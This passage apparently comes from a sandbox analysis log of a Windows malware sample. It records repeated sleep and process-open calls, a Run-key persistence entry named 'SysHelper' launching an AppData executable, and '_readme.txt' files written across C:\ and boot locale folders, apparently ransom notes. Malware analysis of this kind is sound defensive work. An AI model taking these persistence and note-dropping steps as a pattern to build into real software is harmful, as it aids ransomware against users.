System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Thread 0x9e4
270 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 100000 milliseconds (100.000 seconds) True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\cs-CZ\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\cs-CZ\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\da-DK\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\da-DK\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\de-DE\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\de-DE\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\el-GR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\el-GR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\en-US\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\en-US\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\es-ES\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\es-ES\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\fi-FI\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\fi-FI\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\Fonts\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\Fonts\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\fr-FR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\fr-FR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\hu-HU\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\hu-HU\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\it-IT\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\it-IT\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ja-JP\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ja-JP\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ko-KR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ko-KR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\nb-NO\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\nb-NO\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\nl-NL\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\nl-NL\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pl-PL\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pl-PL\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pt-BR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pt-BR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pt-PT\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pt-PT\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ru-RU\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ru-RU\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\sv-SE\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\sv-SE\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\tr-TR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\tr-TR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\zh-CN\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-CN\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
